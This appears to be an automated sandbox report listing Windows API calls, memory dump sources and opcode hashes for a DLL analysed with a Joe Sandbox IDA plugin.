                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D40D258
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D40D262
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D40D26F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                      • String ID:
                                                                                                      • API String ID: 3906539128-0
                                                                                                      • Opcode ID: a9feee55f729b7920d225c5afdebcb1a13bc581d221d68a0ed5e462f340e515e
                                                                                                      • Instruction ID: 1e371bc42d30ecd23868a8229e83163614dcdd01f3eb12a50e3d21d693090719
                                                                                                      • Opcode Fuzzy Hash: a9feee55f729b7920d225c5afdebcb1a13bc581d221d68a0ed5e462f340e515e
                                                                                                      • Instruction Fuzzy Hash: 1031D67490121DABCB21DF64D988BDDBBB8BF48310F5042EAE91CA7250E7709F858F55
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,?,6D4102D6,?,00000000,?,?,?,6D4153C8), ref: 6D4102F9
                                                                                                      • TerminateProcess.KERNEL32(00000000,?,6D4102D6,?,00000000,?,?,?,6D4153C8), ref: 6D410300
                                                                                                      • ExitProcess.KERNEL32 ref: 6D410312
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: cd36cf8e1aaa6f84a7aad1f56eb2535169f32c64c6229e2558e485fdb08319ff
                                                                                                      • Instruction ID: a35068b3db44f08cc787961ad0450c29e0a72c334d188e4988f25f30433e652a
                                                                                                      • Opcode Fuzzy Hash: cd36cf8e1aaa6f84a7aad1f56eb2535169f32c64c6229e2558e485fdb08319ff
                                                                                                      • Instruction Fuzzy Hash: 82E0B63140928DAFCF216F55CE08F693B79EB46281B214419FA1996624CB36DD62DA90
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .
                                                                                                      • API String ID: 0-248832578
                                                                                                      • Opcode ID: 83ccdf8516d7d8a41f129124739e18e031ef728a74fe355965cf663cb2fe31c0
                                                                                                      • Instruction ID: 20a8b8f03df2413fc81f8dc237f8952e8222e5b4ea14636cfb10e91ddd3e09cb
                                                                                                      • Opcode Fuzzy Hash: 83ccdf8516d7d8a41f129124739e18e031ef728a74fe355965cf663cb2fe31c0
                                                                                                      • Instruction Fuzzy Hash: B231F471908209AFDB14CE68CC84EFA77BDEB86318F2401ACE56997351E7329D458B90
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • EnumSystemLocalesW.KERNEL32(6D41D95E,00000001,00000000,?,|3Am,?,6D41DF92,00000000,?,?,?), ref: 6D41D8A7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID: |3Am
                                                                                                      • API String ID: 2417226690-4242667600
                                                                                                      • Opcode ID: 2ed3c64fabe2d9050a7e30861c146695f02fadaf244723abb145d5b6cf2cc76a
                                                                                                      • Instruction ID: 4fc3cad0e1578bbed9cab941704625aa860265115bc18fcbc25e6ce988c47c48
                                                                                                      • Opcode Fuzzy Hash: 2ed3c64fabe2d9050a7e30861c146695f02fadaf244723abb145d5b6cf2cc76a
                                                                                                      • Instruction Fuzzy Hash: CA11C67A2087069FDB189F39CC90ABAB7A1FBC0368B19842DD99687B40D771B942C740
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • EnumSystemLocalesW.KERNEL32(6D41DBAE,00000001,00000000,?,|3Am,?,6D41DF56,|3Am,?,?,?,?,?,6D41337C,?,?), ref: 6D41D91D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID: |3Am
                                                                                                      • API String ID: 2417226690-4242667600
                                                                                                      • Opcode ID: 9b8d59958a922d8d1733196771d7902e7dd4e0c0350afb38e631bafc1551ad68
                                                                                                      • Instruction ID: 43b0a2bc30faadcdb33b6ce2de21acb66448dbf5dd44ec7555552efb84abc3b8
                                                                                                      • Opcode Fuzzy Hash: 9b8d59958a922d8d1733196771d7902e7dd4e0c0350afb38e631bafc1551ad68
                                                                                                      • Instruction Fuzzy Hash: E6F0C2762083056FD714AF39DC80F7ABBA1EFC1328B15842DFA468B650D7719C41DA50
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,6D413416,?,20001004,?,00000002,?), ref: 6D414F30
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: Eh@m
                                                                                                      • API String ID: 2299586839-137412459
                                                                                                      • Opcode ID: f1d0017468717180d2e1253fb376f628dd309be866531b7c366f6efa23194a10
                                                                                                      • Instruction ID: 07228d507fae3117d214650d5e1836261fa90227bbfb0e90faa578e8b7b4ec0c
                                                                                                      • Opcode Fuzzy Hash: f1d0017468717180d2e1253fb376f628dd309be866531b7c366f6efa23194a10
                                                                                                      • Instruction Fuzzy Hash: BBF05E31A09118BBCF12EF21DC04FBE7B65EF49754F014158FD0956250DB328E219A95
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 48e7978e34df967921d07a0d8b27288c72f427538071bd43770a5ee21a2476a0
                                                                                                      • Instruction ID: fa1d5b6cb2aaf45a3a59874e21d59fb594fc4502460098fd42e7eab2dbaebe70
                                                                                                      • Opcode Fuzzy Hash: 48e7978e34df967921d07a0d8b27288c72f427538071bd43770a5ee21a2476a0
                                                                                                      • Instruction Fuzzy Hash: 81023B71E052199FDB14CFA9C890AADB7F5FF88314F25827AD919A7380D731AE018B84
                                                                                                      APIs
                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D414365,?,?,00000008,?,?,6D41EED1,00000000), ref: 6D414597
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise
                                                                                                      • String ID:
                                                                                                      • API String ID: 3997070919-0
                                                                                                      • Opcode ID: eb5906647b92e80c7ffef04269104927bada5fd2f37ec9a7b4f0365c0026b295
                                                                                                      • Instruction ID: 7876821afff1c91c9ed3b8d0023efbfe1f1828830933ad895ceaa38ef8b47d2b
                                                                                                      • Opcode Fuzzy Hash: eb5906647b92e80c7ffef04269104927bada5fd2f37ec9a7b4f0365c0026b295
                                                                                                      • Instruction Fuzzy Hash: 13B109356146099FD705CF28C886B657BE0FF493A8F258658E9ADCF2A1C335ED92CB40
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D40886A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 2325560087-0
                                                                                                      • Opcode ID: cab1bef96808c01e25e8448d8f8402e9f1178bb6876b562a915ec48ac15dcdad
                                                                                                      • Instruction ID: 9c93bd1e356d257ea76316a136fff4673329d59dbd3720938af7d9f741857d4d
                                                                                                      • Opcode Fuzzy Hash: cab1bef96808c01e25e8448d8f8402e9f1178bb6876b562a915ec48ac15dcdad
                                                                                                      • Instruction Fuzzy Hash: FD5149B1A0560A8BEB15EF9AD981BAABBF0FB49710F21852AD415EB340D374DD00CF60
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                        • Part of subcall function 6D411F56: _free.LIBCMT ref: 6D411FB1
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D41DC02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 787680540-0
                                                                                                      • Opcode ID: dc35ed35177500309d8d4afc8a98cbf4db6b4f323083578d4e6ca1a9211dfe8e
                                                                                                      • Instruction ID: 050d7dd24af0a0d60986bad6d4811c1a2829a803cd5de4ff14d1e65528b4aed8
                                                                                                      • Opcode Fuzzy Hash: dc35ed35177500309d8d4afc8a98cbf4db6b4f323083578d4e6ca1a9211dfe8e
                                                                                                      • Instruction Fuzzy Hash: C521A1B255C20AABDB14DF24DC85FBA73A8EB85314F10457AEA15C6240FB759D44CB90
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6D41DB7C,00000000,00000000,?), ref: 6D41DE0B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 3736152602-0
                                                                                                      • Opcode ID: efb86c5c5b344a9e8936ffebd3f1dba60fef14fa500672f96861aaf6a75758c3
                                                                                                      • Instruction ID: db0d24d9af8e3706f5a244a4fc0947454bcc8fc0ae949e0b6a09a83eed3a76e9
                                                                                                      • Opcode Fuzzy Hash: efb86c5c5b344a9e8936ffebd3f1dba60fef14fa500672f96861aaf6a75758c3
                                                                                                      • Instruction Fuzzy Hash: 40F0D172A18616ABDB149A24CC45FBB7768FBD0369F11446DED19A3240EB38BD12CAD0
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                        • Part of subcall function 6D411F56: _free.LIBCMT ref: 6D411FB1
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6D413383,00000000,6D4134A3), ref: 6D41D795
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                                                      • String ID: DUBmE
                                                                                                      • API String ID: 787680540-846794591
                                                                                                      • Opcode ID: 0b3eef82f929ea098c0997bb27f18246dccad1d233bf6140f3bde90d2b9739f9
                                                                                                      • Instruction ID: 66125084af80faf4d88c177ad8de551d12079e9becfb704814b6322f0b82c2df
                                                                                                      • Opcode Fuzzy Hash: 0b3eef82f929ea098c0997bb27f18246dccad1d233bf6140f3bde90d2b9739f9
                                                                                                      • Instruction Fuzzy Hash: FBF0F472A59109ABDB14EF24DC04FBA73A8EB85324F0101BEEB1AD7240EB34AD058794
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D40D447: EnterCriticalSection.KERNEL32(?,?,6D40FED0,00000000,6D42E310,0000000C,6D40FE8B,?,?,?,6D41496C,?,?,6D4120FA,00000001,00000364), ref: 6D40D456
                                                                                                      • EnumSystemLocalesW.KERNEL32(6D414996,00000001,6D42E4D0,0000000C,6D414D85,00000000,00000000), ref: 6D4149DB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1272433827-0
                                                                                                      • Opcode ID: 5e839ced99b61e2fa146d03ceb2dd2039217d299048df75e9256642229aefeb8
                                                                                                      • Instruction ID: 075d5c0a9c6ccf40cc6ba7df760f18be983f4291f86e72cfbc9aa4ccd55e18c2
                                                                                                      • Opcode Fuzzy Hash: 5e839ced99b61e2fa146d03ceb2dd2039217d299048df75e9256642229aefeb8
                                                                                                      • Instruction Fuzzy Hash: B6F0497A924204EFDB10EFA9C944F6E37B0EB05328F028129E614EB291CB348D409B95
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • EnumSystemLocalesW.KERNEL32(6D41D741,00000001,00000000,?,?,6D41DFB4,|3Am,?,?,?,?,?,6D41337C,?,?,?), ref: 6D41D821
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2417226690-0
                                                                                                      • Opcode ID: 0c0c481fb0c9ed566c4af3c35e6bb4d74b59340cca28bac418ad5fc96d416601
                                                                                                      • Instruction ID: 904e60650ec44f7998c873e9a36cf3a65a301bac2f98235f4e9886ca31446928
                                                                                                      • Opcode Fuzzy Hash: 0c0c481fb0c9ed566c4af3c35e6bb4d74b59340cca28bac418ad5fc96d416601
                                                                                                      • Instruction Fuzzy Hash: 4CF0A07A30824657CB04AB35DD45A7ABBA4EBC1764B1A4059EE198B640C7319C43C7A0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 0-4108050209
                                                                                                      • Opcode ID: dd0aa1ed614b0a8bf40b50611dad1ec735aff16f5d9d4b7c4f468f230bbb6051
                                                                                                      • Instruction ID: 59ead4a6f0d260335f0f18a60e679652d620b637b2384e08e20b2e4ce3ea0e2c
                                                                                                      • Opcode Fuzzy Hash: dd0aa1ed614b0a8bf40b50611dad1ec735aff16f5d9d4b7c4f468f230bbb6051
                                                                                                      • Instruction Fuzzy Hash: 02513772688A0BD7DF118B788450FBF77A5AB43344F20463AD992C7381D715DD4683BA
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: c75a39d10d503a4da0036846f29441ea9708f901810258d97237c0dddc38a9d4
                                                                                                      • Instruction ID: db299f33bf81d416e9926ca9f0b1af4bd3b35d9ccafb574f974e1368b646ecea
                                                                                                      • Opcode Fuzzy Hash: c75a39d10d503a4da0036846f29441ea9708f901810258d97237c0dddc38a9d4
                                                                                                      • Instruction Fuzzy Hash: 5FA011302022008B8BA0AE3EC20A30A3AF8BA0A2803020028E008C2280EF30C8808A00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 696655b0fd973e0398e8f42aaf9d10ab528040dd2a0e92677d6d03e25f9b4e54
                                                                                                      • Instruction ID: d40c96a00842e7d367e9a1feea995ebaa671daec881ee62fcbd69d66b56f76ad
                                                                                                      • Opcode Fuzzy Hash: 696655b0fd973e0398e8f42aaf9d10ab528040dd2a0e92677d6d03e25f9b4e54
                                                                                                      • Instruction Fuzzy Hash: 64322531D29F015DDB23A534CC22335A658AFB73D4F15EB27F829B5A99EB39C9834101
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
